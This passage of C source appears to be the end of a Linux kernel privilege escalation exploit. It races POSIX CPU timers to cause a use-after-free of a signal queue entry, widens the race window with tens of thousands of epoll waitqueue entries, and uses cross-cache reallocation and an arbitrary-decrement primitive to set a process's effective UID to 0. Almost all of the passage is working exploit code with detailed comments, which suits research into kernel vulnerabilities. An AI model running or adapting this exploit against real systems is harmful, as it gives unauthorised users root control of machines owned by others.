race or not. // // In any case, we re-allocate the UAF timer now, because it prevents hitting the // `BUG_ON` in `send_sigqueue()` if the timer was actually freed. SYSCHK(timer_create(CLOCK_THREAD_CPUTIME_ID, &realloc_evt, &realloc_timer)); // If we assume we won the race, now `realloc_timer->sigq` is the same as `uaf_timer->sigq`, // and `uaf_timer` is currently being handled by `handle_posix_cpu_timers()` via RACER thread. // // We want to wait a certain amount of time to let the RACER thread enter `send_sigqueue()` // with the `uaf_timer->sigq`, and go past the `!list_empty()` check. usleep(parent_settime_delay); // Once past the `!list_empty()` check in `send_sigqueue()`, // the `signalfd_notify()` is going to extend the 2nd race window for us. // // In that 2nd race window, use `timer_settime()` to fire the realloc timer immediately // by setting the time in the past, and using `TIMER_ABSTIME`. // // If we time it just right, the RACER thread's `send_sigqueue()` will be past the // `!list_empty()` check, and we'll also get past the check before either thread is // able to insert the `sigqueue` into the target task's pending list. // // At this point, if all of it lined up, this same `sigqueue` will be inserted into both // parent and child's pending lists at the same time. SYSCHK(timer_settime(realloc_timer, TIMER_ABSTIME, &fire_ts, NULL)); // The child process will tell us whether it received SIGUSR2 or not. This // is how we know whether we won the first race or not. SYSCHK(read(exploit_child_to_parent[0], &m, 1)); // sync 5 // If the child tells us that it didn't receive SIGUSR2, then there are two // situations: // // 1. We lost the 1st race, so the child received NUM_TIMERS+1 SIGUSR1 signals. This // means the child never could have seen the SIGUSR2 signal. // 2. We won the 1st race, but the didn't win the 2nd race. This means the child could // have seen the SIGUSR2 signal, but since it says it didn't, it means our timer // fired too early. // // In the 2nd case, the signal's `overrun` field will be set to 1. if (m == FAIL_CHAR) { // NOTE: no need to poll here, because we'll have the signal here for sure. // After all, we fired it didn't we? :p struct signalfd_siginfo si; SYSCHK(read(sigusr2_sfd, &si, sizeof(si))); // Check for the 2nd case above, did the child receive the SIGUSR2 signal // after it was already queued into our pending list? if (si.ssi_overrun > 0) { // We queued the SIGUSR2 too early into our pending list, so // increase the `timer_settime()` delay for next time. printf("\t[+] Parent raced too early, readjusting...\n"); parent_settime_delay += PARENT_SETTIME_DELAY_US_DELTA; } else { // 1st case above, reallocation just failed completely. We // don't need to do anything. } } else { // The child was able to observe the SIGUSR2 signal, which means we won the // first race and successfully reallocated the `sigqueue` of the UAF timer. // // Now, since the child saw the SIGUSR2 signal, we have to check to see if // we see the signal too (i.e double insertion check). struct pollfd pfd = { .fd = sigusr2_sfd, .events = POLLIN }; int ret = poll(&pfd, 1, 1); if (ret < 0) { // Some unknown error, pause to debug it. perror("Exploit success path poll"); getchar(); } else if (pfd.revents & POLLIN) { // We got the SIGUSR2 signal too, which means we won both races. // First, let the child know that we succeeded. SYSCHK(write(exploit_parent_to_child[1], SUCCESS_STR, 1)); // sync 6.SUCCESS // SUCCESS_COMMENT: // UAF sigqueue is now in both process's pending list, but we don't // know which list the UAF sigqueue's list is pointing to. // // This matters because when we dequeue this signal from the // pending list, two things will happen: // // 1. The sigqueue will be removed from the list that it *thinks* // it's in. // 2. The other list will still point to the `sigqueue`, but the // `sigqueue` itself is considered "empty" and thus cannot ever // be removed from that other list. // // We need to know which list the sigqueue *thinks* it's in, so we can // continuously dequeue it later as much as we want through the other // list (after all, that's the only primitive we have, since only the // task pending list has a reference to this UAF sigqueue). // // To figure this out, first delete the timer, so that dequeueing the // UAF sigqueue later will free it. SYSCHK(timer_delete(realloc_timer)); // Now, dequeue the UAF sigqueue. It doesn't matter that we dequeue // it from the parent process, because the UAF sigqueue's own list // pointers determines which list it's going to be removed from. struct signalfd_siginfo si; SYSCHK(read(sigusr2_sfd, &si, sizeof(si))); // At this point, two cases: // // 1. If the UAF sigqueue's list pointers pointed to the parent's list, // then polling here should timeout and not return any pending // signals (as we just removed it). // 2. If it pointed to the child's list, polling here will still // return the signal, because the parent still points to it. int ret = poll(&pfd, 1, 1); if (ret > 0 && (pfd.revents & POLLIN)) { // We have the infinitely looping sigqueue in our pending list. // Let the child know via the fail string because we won. SYSCHK(write(exploit_parent_to_child[1], FAIL_STR, 1)); // sync 7.FAIL // Mark this parent as being the owner of the UAF sigqueue. parent_owns_uaf_sigqueue = 1; buggy_pid = (pid_t)syscall(SYS_gettid); printf("\t[+] Freed UAF sigqueue in parent process pid %d\n", buggy_pid); // Initiate stage 2 second_stage_exploit(); SYSCHK(write(exploit_parent_to_child[1], FAIL_STR, 1)); // sync 8.FAIL } else if (!ret) { // Timeout, means the `sigqueue` is in the child's list. // Let the child know via the success string. SYSCHK(write(exploit_parent_to_child[1], SUCCESS_STR, 1)); // sync 7.SUCCESS // Child will let us know when to continue. SYSCHK(read(exploit_child_to_parent[0], &m, 1)); // stage 2 - sync 1 second_stage_exploit(); } else { // unknown error, just pause to debug it perror("Exploit success path poll 2 unknown error"); getchar(); } } else if (!ret) { // Timeout case, we didn't receive the SIGUSR2 signal, but the // child told us that it did. This means we won the first race // and successfully reallocated over the UAF timer's sigqueue, // but our `timer_settime()` fired too late. // // Adjust `start_sleep_time` accordingly to run `timer_settime()` // earlier next time. printf("\t[+] Parent raced too late, readjusting...\n"); parent_settime_delay -= PARENT_SETTIME_DELAY_US_DELTA; // Let the child know that we failed. SYSCHK(write(exploit_parent_to_child[1], FAIL_STR, 1)); // sync 6.FAIL } } } // Let the child process delete and free the timer, and // all threads before retrying. SYSCHK(read(exploit_child_to_parent[0], &m, 1)); // sync 9 // Free `realloc_timer` if it was ever allocated. if (realloc_timer != (void *) -1) { timer_delete(realloc_timer); } } // UNREACHABLE CODE: // Wait for child to exit before exiting waitpid(pid, NULL, __WALL); close(exploit_child_to_parent[0]); close(exploit_parent_to_child[1]); exit(0); } else { // exploit child process pin_on_cpu(1); close(exploit_child_to_parent[0]); close(exploit_parent_to_child[1]); exploit_child_pid = (pid_t)syscall(SYS_gettid); // Create signalfds, one each for SIGUSR1, SIGUSR2, SIGRTMIN+1, and SIGRTMIN+2. sigset_t block_mask; sigemptyset(&block_mask); sigaddset(&block_mask, SIGUSR1); sigusr1_sfds[0] = SYSCHK(signalfd(-1, &block_mask, SFD_CLOEXEC | SFD_NONBLOCK)); sigemptyset(&block_mask); sigaddset(&block_mask, SIGUSR2); sigusr2_sfds[0] = SYSCHK(signalfd(-1, &block_mask, SFD_CLOEXEC | SFD_NONBLOCK)); sigemptyset(&block_mask); sigaddset(&block_mask, SIGRTMIN+1); int sigrt1_sfd = SYSCHK(signalfd(-1, &block_mask, SFD_CLOEXEC | SFD_NONBLOCK)); sigemptyset(&block_mask); sigaddset(&block_mask, SIGRTMIN+2); int sigrt2_sfd = SYSCHK(signalfd(-1, &block_mask, SFD_CLOEXEC | SFD_NONBLOCK)); // Block all the above signals as well for later sigemptyset(&block_mask); sigaddset(&block_mask, SIGUSR1); sigaddset(&block_mask, SIGUSR2); sigaddset(&block_mask, SIGRTMIN+1); sigaddset(&block_mask, SIGRTMIN+2); sigprocmask(SIG_BLOCK, &block_mask, NULL); // Duplicate the SIGUSR1 and SIGUSR2 sfds, and set up epoll // watchers on them. In total, 50,000 waitqueue entries will // be created. // // Credit: Jann Horn: // https://googleprojectzero.blogspot.com/2022/03/racing-against-clock-hitting-tiny.html int epoll_fds[EPOLL_COUNT]; for (int i = 0; i < EPOLL_COUNT; i++) { epoll_fds[i] = SYSCHK(epoll_create1(EPOLL_CLOEXEC)); } // Duplicate sfds, index 0 is the original for (int i = 1; i < SFD_DUP_COUNT; i++) { sigusr1_sfds[i] = SYSCHK(dup(sigusr1_sfds[0])); sigusr2_sfds[i] = SYSCHK(dup(sigusr2_sfds[0])); } // Setup epoll watchers now struct epoll_event ev = {0}; ev.events = EPOLLIN; for (int i = 0; i < EPOLL_COUNT; i++) { for (int j = 0; j < SFD_DUP_COUNT; j++) { ev.data.fd = sigusr1_sfds[j]; SYSCHK(epoll_ctl(epoll_fds[i], EPOLL_CTL_ADD, sigusr1_sfds[j], &ev)); ev.data.fd = sigusr2_sfds[j]; SYSCHK(epoll_ctl(epoll_fds[i], EPOLL_CTL_ADD, sigusr2_sfds[j], &ev)); } } // 50,000 waitqueue entries now setup on the signalfds for // `signalfd_notify()` in the kernel later. prctl(PR_SET_NAME, "EXPLOIT_CHILD"); pthread_barrier_init(&barrier, NULL, 2); // Thread that will handle freeing the UAF timer. pthread_t free_timer_thread; // On a different CPU to the cross-cache CPUs, enqueue a `SIGRTMIN+2` signal. // This is used later to leak the task pending list address. pid_t my_pid = (pid_t)syscall(SYS_gettid); SYSCHK(syscall(__NR_tkill, my_pid, SIGRTMIN+2)); printf("[+] Stage 1 - Attempting to win the race...\n"); while (1) { // printf("Try %d\n", race_retry_count+1); // Reset `uaf_timer` before every attempt. uaf_timer = (void *) -1; // Drain signalfds as they could have left over signals from // the previous try. struct signalfd_siginfo si; drain_signalfd(sigusr1_sfds[0]); drain_signalfd(sigusr2_sfds[0]); // Create the FREE_TIMER and RACER threads SYSCHK(pthread_create(&race_thread, NULL, (void*)race_func, NULL)); SYSCHK(pthread_create(&free_timer_thread, NULL, (void*)free_func, NULL)); // Parent process writes to us when attached and continued, use // a barrier to continue the RACER thread now SYSCHK(read(exploit_parent_to_child[0], &m, 1)); // sync 2 pthread_barrier_wait(&barrier); // barrier 1 // Wait for timers to be created by RACER thread pthread_barrier_wait(&barrier); // barrier 2 // Arm the timers now, ensuring the first 18 are before the // UAF timer struct itimerspec ts = { .it_interval = {0, 0}, .it_value = { .tv_sec = 0, .tv_nsec = ONE_MS_NS - 1, }, }; for (int i = 0; i < NUM_TIMERS; i++) { SYSCHK(timer_settime(stall_timers[i], 0, &ts, NULL)); } // Arm UAF timer as the latest one ts.it_value.tv_nsec = ONE_MS_NS; SYSCHK(timer_settime(uaf_timer, 0, &ts, NULL)); // Now, let RACER thread continue pthread_barrier_wait(&barrier); // barrier 3 // Parent exploit process tells us after `waitpid()` returns. SYSCHK(read(exploit_parent_to_child[0], &m, 1)); // sync 3 // Wait up to 100ms for the any signals to be received // // NOTE: Depending on how long the race window is, this timeout // may need to be longer. // // In my case, the race window is 24-30ms long, so 100ms is // plenty. struct pollfd pfds[2] = { { .fd = sigusr1_sfds[0], .events = POLLIN }, { .fd = sigusr2_sfds[0], .events = POLLIN }, }; int sigusr1_count = 0; int race_won = 0; // This is unused normally, but can be used with a kernel // patch. See below. int poll_timeout = 100; // Poll for SIGUSR1 and SIGUSR2. for (;;) { int ret = poll(pfds, 2, poll_timeout); if (!ret) { // Timeout case means one of two things: // // 1. No timers were fired at all. // 2. Timers were fired, but the 2nd race was lost, so // we didn't see the reallocated timer's SIGUSR2 signal. // // In the first case, `sigusr1_count` will be 0, use that // to know that we should cancel the `free_timer_thread`, // as otherwise it will be running and waiting forever for // a signal. if (!sigusr1_count) { pthread_cancel(free_timer_thread); } // In the 2nd case, we'll hit this timeout only if the parent // process queued the SIGUSR2 signal on itself before we could // enter the 2nd race window (so we failed the `!list_empty()` check). // // This basically means we didn't receive the SIGUSR2 signal, but // also received one less SIGUSR1 signal than we'd expect (because the // UAF timer that was supposed to send us the last SIGUSR1 was reallocated). // // In this case, the `free_func()` thread will have already exited. We // just let the parent know. // // Note: for the first case above, we also let the parent know. That's why // this write is marked with sync 4.FAIL and sync 5.FAIL, since it // handles two separate failure scenarios. SYSCHK(write(exploit_child_to_parent[1], FAIL_STR, 1)); // sync 4.FAIL, 5.FAIL break; } else if (ret > 0 && (pfds[0].revents & POLLIN)) { // We got SIGUSR1! Timers fired. // // Wait for the `free_func()` thread to handle the SIGUSR1 // signal first before doing anything the first time. if (!sigusr1_count) pthread_barrier_wait(&barrier); // barrier 4 // KERNEL PATCH: change timeout to 1s after SIGUSR1 seen, guarantees // that we win the second race. // poll_timeout = 1000; // Got the SIGUSR1 signal, drain it and increase count sigusr1_count += drain_signalfd(sigusr1_sfds[0]); if (sigusr1_count >= NUM_TIMERS+1) { // Receiving 19 SIGUSR1 signals means the first race failed, // because the parent process failed to reallocate and change // the UAF timer's signal to SIGUSR2. // // The parent process will be waiting for us to let it know // whether the reallocated timer was able to send us the // SIGUSR2 or not. In this case, we failed. // // Let the parent know and exit this poll loop. SYSCHK(write(exploit_child_to_parent[1], FAIL_STR, 1)); // sync 5.FAIL break; } } else if (ret > 0 && (pfds[1].revents & POLLIN)) { // We got SIGUSR2! Race is potentially won, so let's check. // Let parent process know to check for SIGUSR2 signal SYSCHK(write(exploit_child_to_parent[1], SUCCESS_STR, 1)); // sync 5.SUCCESS SYSCHK(read(exploit_parent_to_child[0], &m, 1)); // sync 6 if (m == SUCCESS_CHAR) { // For an explanation of the below steps, ctrl+f for // "SUCCESS_COMMENT:" in this exploit. It explains // how to figure out which list the `sigqueue's` next // and prev pointers point to (i.e child or parent process's // pending list). SYSCHK(read(exploit_parent_to_child[0], &m, 1)); // sync 7 // Parent tells us whether we have the UAF sigqueue in our pending list or not. if (m == SUCCESS_CHAR) { // We have the signal in our list. // // This is an extremely rare situation, as the race window for this // to occur is so incredibly small. // // If you see "Freed sigqueue in child process" and the exploit fails, // please restart :) because I have never ran into this situation, so // the exploit is untested from here on out. parent_owns_uaf_sigqueue = 0; buggy_pid = (pid_t)syscall(SYS_gettid); printf("\t[+] Freed UAF sigqueue in child process pid %d\n", buggy_pid); printf("\t[+] NOTE: The exploit is untested in this state. If you reach here and the exploit fails, please retry :)\n"); // Tell the parent to continue the exploit now. SYSCHK(write(exploit_child_to_parent[1], SUCCESS_STR, 1)); // stage 2 - sync 1 // Parent will tell us to dequeue the SIGRTMIN+2 signal. SYSCHK(read(exploit_parent_to_child[0], &m, 1)); // stage 2 - sync 2 // Dequeueing this signal will put the pointer of our task struct's pending list // into the ->prev pointer of the UAF sigqueue. SYSCHK(read(sigrt2_sfd, &si, sizeof(si))); // Let the parent know it can continue SYSCHK(write(exploit_child_to_parent[1], SUCCESS_STR, 1)); // stage 2 - sync 3 // Wait for the parent to ask us to dequeue the SIGUSR2 signal now. SYSCHK(read(exploit_parent_to_child[0], &m, 1)); // stage 2 - sync 4 // Now dequeue the UAF sigqueue's signal to write it's own pointers back into itself. // This will happen because of the `list_del_init()` in `collect_signal()`. // // The parent does this on CPU 2, so we do the same here, and switch back // afterwards. // // NOTE: After this, SIGUSR2 is removed from the task's signal mask, but // SIGRTMIN+1 stays. pin_on_cpu(2); SYSCHK(read(sigusr2_sfds[0], &si, sizeof(si))); pin_on_cpu(1); // Let the parent know it can continue SYSCHK(write(exploit_child_to_parent[1], SUCCESS_STR, 1)); // stage 2 - sync 5 // Parent will let us know when to dequeue the other sigqueue SYSCHK(read(exploit_parent_to_child[0], &m, 1)); // stage 2 - sync 6 // Dequeue the SIGRTMIN+1 signal. This MUST be done on CPU 2 for the // second cross-cache to work. pin_on_cpu(2); SYSCHK(read(sigrt1_sfd, &si, sizeof(si))); pin_on_cpu(1); // Let the parent know it can continue SYSCHK(write(exploit_child_to_parent[1], SUCCESS_STR, 1)); // stage 2 - sync 7 // Parent will let us know when to use the arbitrary decrement primitive. SYSCHK(read(exploit_parent_to_child[0], &m, 1)); // stage 2 - sync 8 // Arbitrary decrement time! Decrement target cred's EUID to 0. This process // will have the same UID as the target cred, so we can use that to know // how many times to decrement. for (int i = 0; i < getuid(); i++) { SYSCHK(read(sigrt1_sfd, &si, sizeof(si))); } // Exploit is now finished, let the parent know and block forever. SYSCHK(write(exploit_child_to_parent[1], SUCCESS_STR, 1)); // stage 2 - sync 9 // This will block forever, parent won't write to us anymore. SYSCHK(read(exploit_parent_to_child[0], &m, 1)); } else { // We don't have the signal in our list, parent can // continue the exploit now. // // This will block forever, parent won't write to us anymore. SYSCHK(read(exploit_parent_to_child[0], &m, 1)); } } else { break; // Failed } } else { // error, just pause to debug it printf("poll error in main\n"); getchar(); } } // If we got here, our current attempt failed. Update `syscall_loop_times`. syscall_loop_times++; syscall_loop_times %= SYSCALL_LOOP_TIMES_MAX+1; race_retry_count++; // Free stall timers for (int i = 0; i < NUM_TIMERS; i++) { timer_delete(stall_timers[i]); } // Free UAF timer in case it didn't get deleted. if (uaf_timer != (void *) -1) { timer_delete(uaf_timer); } // Either the `free_timer_thread` got a signal and exited // normally, or it didn't get a signal and we cancelled // it in the poll code above. Either way, we can join it. SYSCHK(pthread_join(free_timer_thread, NULL)); // Signal to parent to try again SYSCHK(write(exploit_child_to_parent[1], "t", 1)); // sync 9 } // UNREACHABLE CODE: // Signal to parent to exit SYSCHK(write(exploit_child_to_parent[1], "t", 1)); // Wait for parent to exit close(exploit_child_to_parent[1]); close(exploit_parent_to_child[0]); for (int i = 0; i < SFD_DUP_COUNT; i++) { close(sigusr2_sfds[i]); close(sigusr1_sfds[i]); } exit(0); } }